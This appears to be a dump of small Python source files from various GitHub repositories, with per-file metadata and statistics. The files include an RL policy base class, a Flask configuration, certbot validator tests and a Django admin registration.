erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 6
|
2020-07-26T15:44:36.000Z
|
2022-02-10T02:15:10.000Z
|
hw1/cs285/policies/base_policy.py
|
erfanMhi/Deep-Reinforcement-Learning-CS285-Pytroch
|
6da04f367e52a451c202ae7e5477994c1d149baf
|
[
"MIT"
] | 16
|
2020-08-04T01:17:45.000Z
|
2022-02-24T04:51:41.000Z
|
import numpy as np
class BasePolicy(object):
def __init__(self, **kwargs):
super(BasePolicy, self).__init__(**kwargs)
def build_graph(self):
raise NotImplementedError
def get_action(self, obs):
raise NotImplementedError
def update(self, obs, acs):
raise NotImplementedError
def save(self, filepath):
raise NotImplementedError
def restore(self, filepath):
raise NotImplementedError
| 20.590909
| 49
| 0.679912
| 48
| 453
| 6.208333
| 0.5
| 0.402685
| 0.362416
| 0.241611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238411
| 453
| 22
| 50
| 20.590909
| 0.863768
| 0
| 0
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.071429
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
6ad00d2c5f1a96b155c88ce776c514d4bc9958e9
| 130
|
py
|
Python
|
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
base/services.py
|
gucciwu/cycling-cap-pyrenees
|
66f62dc5c074029801cddde3319a507d8c182374
|
[
"MIT"
] | null | null | null |
import random
NICK_NAME_LIST = ["望尘莫及", "不见后背", "追风侠", "一意孤行"]
def random_nickname():
return random.choice(NICK_NAME_LIST)
| 16.25
| 48
| 0.7
| 18
| 130
| 4.777778
| 0.722222
| 0.186047
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 7
| 49
| 18.571429
| 0.774775
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
6ae14262202db1c416494f94eed1042e771c31e9
| 167
|
py
|
Python
|
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
jrounds/EvadeML-Zoo
|
a0d44e649f71e3a66b5acf6094ca33d2f4514105
|
[
"MIT"
] | null | null | null |
from .datasets_utils import *
from .mnist import MNISTDataset
from .cifar10 import CIFAR10Dataset
from .imagenet import ImageNetDataset
#from .svhn import SVHNDataset
| 27.833333
| 37
| 0.838323
| 20
| 167
| 6.95
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027211
| 0.11976
| 167
| 5
| 38
| 33.4
| 0.918367
| 0.173653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0aa8b7a1a9cece790172f54f51215b9f85965126
| 74
|
py
|
Python
|
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
plc/__init__.py
|
eric-cgn/plc
|
16a26a3b0cf844bd42ed4554b7d24d8c0a55685a
|
[
"CC0-1.0"
] | null | null | null |
from .plc import PLC, ICommand, Dimmer

# __all__ must contain attribute *names* as strings; listing the objects
# themselves makes `from plc import *` raise TypeError when Python tries
# to look each entry up by name on the module.
__all__ = ["PLC", "ICommand", "Dimmer"]
| 18.5
| 38
| 0.72973
| 10
| 74
| 5
| 0.6
| 0.44
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 3
| 39
| 24.666667
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0ab9b97b750f1101834ad28200c124851e75ef9e
| 129
|
py
|
Python
|
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
multilabel.py
|
shohan4556/school-budgeting-with-ML
|
0802197bd21ce7f19b06a4d97ee2e16276a6950b
|
[
"MIT"
] | null | null | null |
version https://git-lfs.github.com/spec/v1
oid sha256:8ff8ccdfbbddda863f6948cdd4f419aaf016de1f267d15971f2979834bf9d41b
size 3204
| 32.25
| 75
| 0.883721
| 13
| 129
| 8.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.349594
| 0.046512
| 129
| 3
| 76
| 43
| 0.577236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7c68897f8c99bea102bc91a2064a776d33efae00
| 277
|
py
|
Python
|
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
hash_tables/following_patterns.py
|
nickaigi/automatic-dollop
|
eb8222475c7871c1d5710242c5aed8c70ea0d2c8
|
[
"Unlicense"
] | null | null | null |
def are_following_patterns(strings, patterns):
    """Return True when `strings` and `patterns` map one-to-one.

    The mapping is a bijection exactly when the number of distinct
    strings, distinct patterns, and distinct (string, pattern) pairs
    all coincide.
    """
    distinct_strings = len(set(strings))
    distinct_patterns = len(set(patterns))
    distinct_pairs = len(set(zip(strings, patterns)))
    return distinct_strings == distinct_patterns == distinct_pairs
# Demo: 'dog' repeats exactly where 'b' repeats, so the pattern is followed.
if __name__ == '__main__':
    strings = ['cat', 'dog', 'dog']
    patterns = ['a', 'b', 'b']
    # NOTE(review): the boolean result is computed but never printed or used.
    are_following_patterns(strings, patterns)
| 27.7
| 86
| 0.646209
| 34
| 277
| 4.911765
| 0.470588
| 0.269461
| 0.239521
| 0.323353
| 0.419162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162455
| 277
| 9
| 87
| 30.777778
| 0.719828
| 0
| 0
| 0
| 0
| 0
| 0.072202
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0.166667
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
6b0e3625756dede51552d436b4f10721989e9f05
| 79
|
py
|
Python
|
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
"MIT"
] | null | null | null |
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
"MIT"
] | null | null | null |
rapidminer/__init__.py
|
ruturajnene/rapidminer-conda-package
|
6f5cb00914dca6f5968b42d7312034aba37156f4
|
[
"MIT"
] | null | null | null |
from .automodel import AutoModelClient
from .rm_handler import RapidMinerClient
| 39.5
| 40
| 0.886076
| 9
| 79
| 7.666667
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088608
| 79
| 2
| 40
| 39.5
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6b2c1cbb5cbad77b1ee4a11e3be027ba5bdcbc83
| 206
|
py
|
Python
|
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
stweet/tweets_by_ids_runner/tweets_by_ids_result.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | null | null | null |
"""Class with result of TweetSearchRunner task."""
from dataclasses import dataclass
@dataclass
class TweetsByIdsResult:
    """Class with result of TweetSearchRunner task."""
    # Count of tweets the task downloaded (per the field name — no other
    # usage is visible here).
    downloaded_count: int
| 18.727273
| 54
| 0.757282
| 22
| 206
| 7.045455
| 0.636364
| 0.116129
| 0.193548
| 0.219355
| 0.490323
| 0.490323
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160194
| 206
| 10
| 55
| 20.6
| 0.895954
| 0.432039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
8628832167b30d3bcaeadd49e22faceea7b74669
| 2,332
|
py
|
Python
|
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | 2
|
2020-12-23T18:59:22.000Z
|
2021-04-14T13:16:09.000Z
|
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | null | null | null |
DailyProgrammer/DP20130114A.py
|
DayGitH/Python-Challenges
|
bc32f1332a92fcc2dfa6f5ea4d95f8a8d64c3edf
|
[
"MIT"
] | null | null | null |
"""
[01/14/13] Challenge #117 [Easy] Hexdump to ASCII
https://www.reddit.com/r/dailyprogrammer/comments/16jiuq/011413_challenge_117_easy_hexdump_to_ascii/
# [](#EasyIcon) *(Easy)*: Hexdump to ASCII
Hexadecimal is a base-16 representation of a number. A single byte of information, as an unsigned integer, can have a
value of 0 to 255 in decimal. This byte can be represented in hexadecimal, from a range of 0x0 to 0xFF in hexadecimal.
Your job is to open a given file (using the given file name) and print every byte's hexadecimal value.
*Author: PoppySeedPlehzr*
# Formal Inputs & Outputs
## Input Description
As a program command-line argument to the program, accept a valid file name.
## Output Description
Print the given file's contents, where each byte of the file must be printed in hexadecimal form. Your program must
print 16 bytes per line, where there is a space between each hexadecimal byte. Each line must start with the line
number, starting from line 0, and must also count in hexadecimal.
# Sample Inputs & Outputs
## Sample Input
"MyFile.txt" (This file is an arbitrary file as an example)
## Sample Output
00000000 37 7A BC AF 27 1C 00 03 38 67 83 24 70 00 00 00
00000001 00 00 00 00 49 00 00 00 00 00 00 00 64 FC 7F 06
00000002 00 28 12 BC 60 28 97 D5 68 12 59 8C 17 8F FE D8
00000003 0E 5D 2C 27 BC D1 87 F6 D2 BE 9B 92 90 E8 FD BA
00000004 A2 B8 A9 F4 BE A6 B8 53 10 E3 BD 60 05 2B 5C 95
00000005 C4 50 B4 FC 10 DE 58 80 0C F5 E1 C0 AC 36 30 74
00000006 82 8B 42 7A 06 A5 D0 0F C2 4F 7B 27 6C 5D 96 24
00000007 25 4F 3A 5D F4 B2 C0 DB 79 3C 86 48 AB 2D 57 11
00000008 53 27 50 FF 89 02 20 F6 31 C2 41 72 84 F7 C9 00
00000009 01 04 06 00 01 09 70 00 07 0B 01 00 01 23 03 01
0000000A 01 05 5D 00 00 01 00 0C 80 F5 00 08 0A 01 A8 3F
0000000B B1 B7 00 00 05 01 11 0B 00 64 00 61 00 74 00 61
0000000C 00 00 00 14 0A 01 00 68 6E B8 CF BC A0 CD 01 15
0000000D 06 01 00 20 00 00 00 00 00
# Challenge Input
Give your program its own binary file, and have it print itself out!
## Challenge Input Solution
This is dependent on how you write your code and what platform you are on.
# Note
* As an added bonus, attempt to print out any ASCII strings, if such data is found in your given file.
"""
def main():
    """Placeholder entry point; the challenge solution is not implemented."""
# Run the (stub) solution when executed as a script.
if __name__ == "__main__":
    main()
| 44.846154
| 118
| 0.722556
| 479
| 2,332
| 3.488518
| 0.54071
| 0.045482
| 0.043088
| 0.033513
| 0.050269
| 0.044285
| 0
| 0
| 0
| 0
| 0
| 0.262479
| 0.23542
| 2,332
| 51
| 119
| 45.72549
| 0.674706
| 0.966981
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
86884fd188141f2cf6a6d9b96eafb13ba15c4986
| 2,957
|
py
|
Python
|
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | null | null | null |
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | null | null | null |
backend/config.py
|
jimbunny/vue-flask-mysql-demo
|
7d2a1883b1c5779bfa4e6bc9afcdb1a53a89c995
|
[
"MIT"
] | 1
|
2021-09-20T10:53:40.000Z
|
2021-09-20T10:53:40.000Z
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# author:jingtongyu
# datetime:2020/6/7 10:14 下午
# software: PyCharm
import os
import multiprocessing
# Absolute path of the directory containing this config module.
basedir = os.path.abspath(os.path.dirname(__file__))
MODE = 'develop'  # develop: development mode; production: production mode
class ProductionConfig(object):
    """Production configuration: gunicorn, logging, MySQL and auth settings."""

    # gunicorn server settings
    BIND = '0.0.0.0:5000'
    WORKERS = multiprocessing.cpu_count() * 2 + 1
    WORKER_CONNECTIONS = 10000
    BACKLOG = 64
    TIMEOUT = 60

    # logging
    LOG_LEVEL = 'INFO'
    LOG_DIR_PATH = os.path.join(os.path.dirname(__file__), 'logs')
    LOG_FILE_MAX_BYTES = 1024 * 1024 * 100
    LOG_FILE_BACKUP_COUNT = 10
    PID_FILE = 'run.pid'

    # sqlite database settings (disabled)
    # SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(os.path.dirname(__file__), 'example.db')
    # SQLALCHEMY_TRACK_MODIFICATIONS = False

    # MySQL connection settings
    HOSTNAME = 'container_mysql'
    PORT = '3306'
    DATABASE = 'demo'
    USERNAME = 'root'
    PASSWORD = 'password'
    # SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@127.0.0.1/tushare?charset=utf8'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8'.format(
        USERNAME, PASSWORD, HOSTNAME, PORT, DATABASE)
    SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
    SQLALCHEMY_TRACK_MODIFICATIONS = True
    BASEDIR = basedir

    # security settings
    CSRF_ENABLED = True
    # Raw strings: the original literals relied on '\s' not being a
    # recognized escape sequence, which emits SyntaxWarning on modern
    # Python; the raw form keeps the value byte-identical.
    SECRET_KEY = r'jklklsadhfjkhwbii9/sdf\sdf'
    JWT_EXPIRY_HOURS = 1
    JWT_REFRESH_DAYS = 1
    JWT_SECRET = r'jklklsadhfjkhwbii9/sdf\sdf'
class DevelopConfig(object):
    """Development configuration: gunicorn, logging, MySQL and auth settings."""

    # gunicorn server settings
    BIND = '0.0.0.0:5000'
    WORKERS = 2
    WORKER_CONNECTIONS = 1000
    BACKLOG = 64
    TIMEOUT = 30

    # logging
    LOG_LEVEL = 'DEBUG'
    LOG_DIR_PATH = os.path.join(os.path.dirname(__file__), 'logs')
    LOG_FILE_MAX_BYTES = 1024 * 1024
    LOG_FILE_BACKUP_COUNT = 1
    PID_FILE = 'run.pid'

    # sqlite database settings (disabled)
    # SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(os.path.dirname(__file__), 'example.db')
    # SQLALCHEMY_TRACK_MODIFICATIONS = False
    # SQLALCHEMY_DATABASE_URI = "mysql+pymysql://root:password@127.0.0.1/demo"

    # MySQL connection settings
    HOSTNAME = 'container_mysql'
    PORT = '3306'
    DATABASE = 'demo'
    USERNAME = 'root'
    PASSWORD = 'password'
    # SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@127.0.0.1/tushare?charset=utf8'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{}:{}@{}:{}/{}?charset=utf8'.format(
        USERNAME, PASSWORD, HOSTNAME, PORT, DATABASE)
    SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
    SQLALCHEMY_TRACK_MODIFICATIONS = True
    BASEDIR = basedir

    # security settings
    CSRF_ENABLED = True
    # Raw strings: the original literals relied on '\s' not being a
    # recognized escape sequence, which emits SyntaxWarning on modern
    # Python; the raw form keeps the value byte-identical.
    SECRET_KEY = r'jklklsadhfjkhwbii9/sdf\sdf'
    JWT_EXPIRY_HOURS = 1
    JWT_REFRESH_DAYS = 1
    JWT_SECRET = r'jklklsadhfjkhwbii9/sdf\sdf'
# Select the active configuration class from the module-level MODE switch.
config = ProductionConfig if MODE == 'production' else DevelopConfig
| 31.457447
| 118
| 0.636456
| 345
| 2,957
| 5.202899
| 0.324638
| 0.040111
| 0.081894
| 0.047354
| 0.728134
| 0.728134
| 0.707521
| 0.686351
| 0.686351
| 0.686351
| 0
| 0.047534
| 0.238756
| 2,957
| 93
| 119
| 31.795699
| 0.749889
| 0.234021
| 0
| 0.633333
| 0
| 0
| 0.161479
| 0.085701
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.033333
| 0
| 0.866667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
86db575c61cf864ea5cc9bcb607bb8918eaf7ebd
| 45
|
py
|
Python
|
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
src/BribeNet/helpers/bribeNetException.py
|
RobMurray98/BribeNet
|
09ddd8f15d9ab5fac44ae516ed92c6ba5e5119bc
|
[
"MIT"
] | null | null | null |
class BribeNetException(Exception):
    """Exception type raised for BribeNet-specific errors."""
| 15
| 35
| 0.777778
| 4
| 45
| 8.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 36
| 22.5
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
86edbdb55ae1edc8dbd045ba3df65934861aad0a
| 5,168
|
py
|
Python
|
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | 1
|
2019-12-23T06:39:49.000Z
|
2019-12-23T06:39:49.000Z
|
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | null | null | null |
letsencrypt/certbot-compatibility-test/certbot_compatibility_test/validator_test.py
|
fengshukun/intapp
|
b09e8ee0ebf8eaa1474e1c9bd075ef9fd1fb1726
|
[
"MIT"
] | null | null | null |
"""Tests for certbot_compatibility_test.validator."""
import unittest
import mock
import OpenSSL
import requests
from acme import errors as acme_errors
from certbot_compatibility_test import validator
class ValidatorTest(unittest.TestCase):
    """Tests for validator.Validator with mocked SNI probes and HTTP gets."""
    def setUp(self):
        # Fresh Validator instance for every test.
        self.validator = validator.Validator()
    @mock.patch(
        "certbot_compatibility_test.validator.crypto_util.probe_sni")
    def test_certificate_success(self, mock_probe_sni):
        # Probe returns the same certificate object -> validation succeeds.
        cert = OpenSSL.crypto.X509()
        mock_probe_sni.return_value = cert
        self.assertTrue(self.validator.certificate(
            cert, "test.com", "127.0.0.1"))
    @mock.patch(
        "certbot_compatibility_test.validator.crypto_util.probe_sni")
    def test_certificate_error(self, mock_probe_sni):
        # Probe raises an ACME error -> validation reports failure.
        cert = OpenSSL.crypto.X509()
        mock_probe_sni.side_effect = [acme_errors.Error]
        self.assertFalse(self.validator.certificate(
            cert, "test.com", "127.0.0.1"))
    @mock.patch(
        "certbot_compatibility_test.validator.crypto_util.probe_sni")
    def test_certificate_failure(self, mock_probe_sni):
        # Probe returns a *different* certificate (serials differ) -> failure.
        cert = OpenSSL.crypto.X509()
        cert.set_serial_number(1337)
        mock_probe_sni.return_value = OpenSSL.crypto.X509()
        self.assertFalse(self.validator.certificate(
            cert, "test.com", "127.0.0.1"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_succesful_redirect(self, mock_get_request):
        # NOTE(review): "succesful" is a typo for "successful"; renaming
        # would change the unittest-discovered test name, so it is kept.
        mock_get_request.return_value = create_response(
            301, {"location": "https://test.com"})
        self.assertTrue(self.validator.redirect("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_redirect_with_headers(self, mock_get_request):
        mock_get_request.return_value = create_response(
            301, {"location": "https://test.com"})
        self.assertTrue(self.validator.redirect(
            "test.com", headers={"Host": "test.com"}))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_redirect_missing_location(self, mock_get_request):
        # 301 without a Location header is not accepted as a redirect.
        mock_get_request.return_value = create_response(301)
        self.assertFalse(self.validator.redirect("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_redirect_wrong_status_code(self, mock_get_request):
        # 201 is not a redirect status.
        mock_get_request.return_value = create_response(
            201, {"location": "https://test.com"})
        self.assertFalse(self.validator.redirect("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_redirect_wrong_redirect_code(self, mock_get_request):
        # Only the expected redirect code passes; 303 is rejected.
        mock_get_request.return_value = create_response(
            303, {"location": "https://test.com"})
        self.assertFalse(self.validator.redirect("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts_empty(self, mock_get_request):
        # Empty strict-transport-security header -> HSTS check fails.
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security": ""})
        self.assertFalse(self.validator.hsts("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts_malformed(self, mock_get_request):
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security": "sdfal"})
        self.assertFalse(self.validator.hsts("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts_bad_max_age(self, mock_get_request):
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security": "max-age=not-an-int"})
        self.assertFalse(self.validator.hsts("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts_expire(self, mock_get_request):
        # max-age=3600 is treated as failing; only the larger value below passes.
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security": "max-age=3600"})
        self.assertFalse(self.validator.hsts("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts(self, mock_get_request):
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security": "max-age=31536000"})
        self.assertTrue(self.validator.hsts("test.com"))
    @mock.patch("certbot_compatibility_test.validator.requests.get")
    def test_hsts_include_subdomains(self, mock_get_request):
        mock_get_request.return_value = create_response(
            headers={"strict-transport-security":
                     "max-age=31536000;includeSubDomains"})
        self.assertTrue(self.validator.hsts("test.com"))
    def test_ocsp_stapling(self):
        # OCSP stapling validation is not implemented by Validator.
        self.assertRaises(
            NotImplementedError, self.validator.ocsp_stapling, "test.com")
def create_response(status_code=200, headers=None):
    """Build a requests.Response stub for testing.

    Applies *status_code* always and *headers* only when provided
    and non-empty.
    """
    stub = requests.Response()
    stub.status_code = status_code
    if headers:
        stub.headers = headers
    return stub
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()  # pragma: no cover
| 41.015873
| 74
| 0.707237
| 622
| 5,168
| 5.596463
| 0.159164
| 0.04424
| 0.08848
| 0.142201
| 0.769319
| 0.759552
| 0.759552
| 0.744614
| 0.733984
| 0.733984
| 0
| 0.016874
| 0.174342
| 5,168
| 125
| 75
| 41.344
| 0.798922
| 0.021672
| 0
| 0.469388
| 0
| 0
| 0.24004
| 0.1778
| 0
| 0
| 0
| 0
| 0.153061
| 1
| 0.173469
| false
| 0
| 0.061224
| 0
| 0.255102
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
86efffd189ba0331ec0a27290f4e063cbc63e34e
| 140
|
py
|
Python
|
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
app_server/admin.py
|
Saketh-Chandra/Honeywell_Hackathon_2021
|
8ce6ca9e2a2c17bbb628d899cc6faa8472227171
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Expose the Object and Param models in the Django admin interface.
admin.site.register(Object)
admin.site.register(Param)
| 20
| 32
| 0.792857
| 20
| 140
| 5.55
| 0.6
| 0.162162
